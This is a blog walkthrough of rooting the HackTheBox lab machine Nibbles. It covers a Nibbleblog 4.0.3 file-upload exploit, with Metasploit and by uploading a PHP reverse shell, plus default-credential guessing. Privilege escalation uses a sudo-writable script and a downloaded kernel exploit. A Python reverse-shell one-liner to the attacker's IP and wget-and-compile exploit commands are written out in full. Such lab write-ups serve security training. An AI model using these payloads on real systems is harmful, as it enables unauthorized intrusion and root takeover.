Nibbles HackTheBox WalkThrough

Nibbles HackTheBox WalkThrough

This is Nibbles HackTheBox machine walkthrough and is also the 15th machine of our OSCP like HTB boxes series. In this writeup, I have demonstrated step-by-step how I rooted to Nibbles HTB machine in two different ways. One using metasploit and other without metasploit. Before starting let us know something about this machine. It is a Linux box with IP address 10.10.10.75 and difficulty easy assigned by its maker.

This machine is currently retired so you will require VIP subscription at hackthebox.eu to access this machine. First of all, connect your PC with HackTheBox VPN and make sure your connectivity with Nibbles machine by pinging IP 10.10.10.75. If all goes correct then start hacking. As usual, I started by scanning the machine. Used Nmap [a port scanner] for this task and the result is below-

Scanning

$ nmap -sC -sV -oN Nibbles.nmap 10.10.10.75

Performing nmap scan in Nibbles HackTheBox WalkThrough

Nmap revealed two ports as open. OpenSSH is running on port 22 and apache2 webserver is running over port 80. Since port 80 is open so we should have some website running over it and the website can be accessed at URL http://10.10.10.75. Ongoing to this website found a blank page containing two words Hello World! and nothing is present on this page. As usual, I checked the page source for some hint in the comment section and luckily this time found some interesting comment. The comment contains URI of this website which is /nibbleblog/.

Comment on Nibbles Web page

Now, we have a new URL to explore over, viz. http://10.10.10.75/nibbleblog/. This URL has nibbleblog CMS installed to it. When I get any CMS then my next step is to check whether the CMS is open source or closed source, its version number and then search for available vulnerability and its exploit on exploit-db using searchsploit. If it is open source CMS then we can simply get its source code at GitHub and check its directory structure as well as file & folder names. This prevents us from bruteforcing for files & folders on our target website. We can also search for the particular file at the website which we see on GitHub.

Default web page of Nibbleblog CMS

A simple googling revealed that it is an open source CMS and its source code is present at GitHub. After some further enumeration got version of this CMS a https://10.10.10.75/nibbleblog/update.php.

Update page of nibbleblog CMS in Nibbles HackTheBox WalkThrough

So we have Nibbleblog v4.0.3. Now we can simply search for available exploits for this version through searchsploit (tool to query exploit-db).

Searching for available exploit

$ searchsploit nibbleblog 4.0.3

Searching for available exploit of nibbleblog in during Nibbles HackTheBox WalkThrough

Searchsploit revealed that this version is effected with Arbitrary File Upload and there is also a metasploit module available for this exploit. Let us check the requirement for this module and exploit this vulnerability using metasploit.

$ sudo msfdb run

msf6 > search nibbleblog

mdf6 > info use exploit/multi/http/nibbleblog_file_upload

Checking the exploit info in metasploit during Nibbles HackTheBox WalkThrough

The metasploit module is exploit/multi/http/nibbleblog_file_upload. This module requires username and password to work. But we don’t have any credentials enumerated so far. Since this is a CMS just like we have WordPress so there should also be a login panel that is used to manage this website. After some more enumeration got login panel at http://10.10.10.75/nibbleblog/admin.php. Tried some default credentials like admin: admin, admin: password, admin: nibbles and luckily admin: nibbles worked. So we have got the credential of admin user. Now we can exploit this vulnerability using metasploit to gain access to nibbles box. I exploited this vulnerability in two different ways. First through metasploit and second without metasploit. Let us get user shell using metasploit.

Getting User Shell Using Metasploit – Method 1

msf6 > use exploit/multi/http/nibbleblog_file_upload

msf6 exploit(multi/http/nibbleblog_file_upload) > set PAYLOAD php/meterpreter/reverse_tcp

msf6 exploit(multi/http/nibbleblog_file_upload) > set RHOSTS 10.10.10.75

msf6 exploit(multi/http/nibbleblog_file_upload) > set LHOST 10.10.14.3

msf6 exploit(multi/http/nibbleblog_file_upload) > set TARGETURI /nibbleblog/

msf6 exploit(multi/http/nibbleblog_file_upload) > set USERNAME admin

msf6 exploit(multi/http/nibbleblog_file_upload) > set PASSWORD nibbles

msf6 exploit(multi/http/nibbleblog_file_upload) > exploit

Getting user shell through metasploit via method 1

We have got user shell using metasploit. Let us exploit this vulnerability without metasploit. You can get more information about this vulnerability and its PoC from here. According to this file upload vulnerability an attacker can upload any malicious script using My image plugin and can execute it because any file uploaded through My Image plugin saves it as its original extension. Check this snippet from curesec.com

Exploit snippet from the website curesec.com

Getting User Shell Without Metasploit – Method 2

To get user shell do the following things.

1. Log in into admin panel at http://10.10.10.75/nibbleblog/admin.php using the credential admin: nibbles.

2. Click on Plugins on left pane and click on configure under My Image plugin name.

3. Upload php-reverse-shell.php and click on Save changes to apply the changes. Php webshell can be found in the directory /usr/share/webshells/php/. Don’t forget to replace the IP address of shell by your tun0 IP before uploading.

4. Start netcat listener on kali machine to accept the reverse connection from this php shell.

5. Access URL http://10.10.10.75/nibbleblog/content/private/plugins/my_image/image.php  to execute the shell. That’s all, you will have a shell now.

1. Login into admin

Nibbleblog Admin dashboard after getting login

2. Click on plugins and then Configure under My Image

nibbleblog-plugin web page found during Nibbles hackthebox walkthrough

3. Upload the shell.

Uploading the webshell in Nibbleblog plugin section

4. Start netcat listener

$ nc -nvlp 8888

5. Execute the uploaded shell

$ curl http://10.10.10.75/nibbleblog/content/private/plugins/my_image/image.php

6. Check the user and its ID after getting shell.

$ whoami && id

Getting user shell through metasploit via method 2 without metasploit in Nibbles Hackthebox Walkthroguh

We have got a user shell. Let us upgrade it to fully qualified Linux shell so that we can run more advanced Linux command through it.

Upgrading Shell

$ python3 -c 'import pty;pty.spawn("/bin/bash")'

$ export TERM=xterm

$ ^Z #Press CTRL+Z to background the shell

$ stty raw -echo

$ fg # And press two times enter to foreground the shell

Upgrading the shell to fully qualified linux shell

Capture User Flag

$cat /home/nibbler/user.txt

Capturing user flag in Nibbles Hackthebox walkthrough

Privilege Escalation

To escalate privilege to root we have to first find a privilege escalation vector using which we can escalate privilege. There are two ways by which you can find privilege escalation vector. Either use some post exploitation enumeration scripts like Linpeas, LinEnum, linux-exploit-suggester, etc. or perform enumeration manually.

Finding PrivEsc Vector

sudo -l command revealed that user nibbler can run monitor.sh as root user, which means that any command that requires root privilege to execute if put inside the script monitor.sh can be executed by user nibbler without asking password. Suppose if we are putting some command like $ sudo python3 inside this file then if we run this script as root user it won’t ask for password.

$ sudo -l

Sudo -l command output

monitor.sh file is present inside the personal.zip folder. So we have to unzip personal.zip to execute monitor.sh script. If you don’t want to unzip this folder you can simply create another monitor.sh file inside directory personal/stuff/. But you have to create personal and stuff folder also because they are not previously present.  I am going to use the same monitor.sh which I got after unzipping personal.zip.

$ unzip personal.zip

Unzipping personal.zip file

monitor.sh script can be read, write and executed by user nibbler because it has rwx permission.

$ find . -ls

Checking the permission of file monitor.sh

Since user nibbler can modify this file so he can also put some reverse shell code into this file and if this file will be run as root then the reverse shell code will also be executed as root and we can get shell on our netcat listener. I did the same things and got root shell. So here our privilege escalation vector is getting root by Sudo Right Exploitation.

This box is also vulnerable to kernel exploit which I came to know when I ran linux-exploit-suggester to find some privilege escalation vector. For more information about this kernel exploit check CVE-2017-16995. So we have also two ways to root this box and that’s what we are going to do the very next. First by using Sudo Right Exploitation and second by using Kernel Exploit.

Linux-Exploit-Suggester result in Nibbles htb writeup

Getting Root Shell via Sudo Right Exploitation – Method 1

To get root shell I did the following things.

On Kali Machine

1. Started netcat listener.

$ nc -nvlp 1234

On Nibbles Machine

2. Changed the directory to personal/stuff/ [Make sure you have already extracted the folder personal.zip or have created the file monitor.sh]

3. Put the following reverse shell code into monitor.sh

sudo python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.3",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

4. Execute the script as root. Ignore the connection time-out error.

$ cd personal/stuff/

$ nano monitor.sh

$ grep -i "sudo python3" monitor.sh

$ sudo -u root ./monitor.sh

Getting root shell in nibbles htb via method 1

We are root now.

Getting Root Shell via Kernel Exploit – Method 2

To get root shell via Kernel Exploit I did the following things.

On Kali Machine

1. Downloaded the exploit from exploit-db.

2. Started python http server to host this file

$ curl https://www.exploit-db.com/download/45010 -o exploit.c

$ sudo python3 -m http.server 80

Downloading the exploit on my local Kali machine

On Nibbles Machine

4. Changed the directory to public writable directory viz., /dev/shm

5. Downloaded the exploit from my kali machine

6. Compiled the exploit

7. Finally run it.

$ cd /dev/shm

$ wget http://10.10.14.3/exploit.c

$ gcc exploit.c

$ ./a.out

# whoami

Getting root shell in nibbles htb via method 2

We have successfully got root. Let us capture root flag.

Capture Root Flag

# cat /root/root.txt

Capturing root flag in Nibbles Hackthebox walkthrough

This was how I rooted to the Nibbles HackTheBox machine. Learnt a lot during this challenge. Hope you guys have also learnt some new things. Thanks for reading this walkthrough. Share your experience in the comment section. For any query and suggestion about the writeup feel free to write us at [email protected].

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.

Deepak Kumar Maurya

Hi everyone, I am Deepak Kumar Maurya, creator of Ethicalhacs.com. I am InfoSec Consultant in day and Bug Bounty Hunter & CTF player at night. Sometimes write walkthrough and other cyber security articles here. You can connect me at https://www.linkedin.com/in/deepakdkm/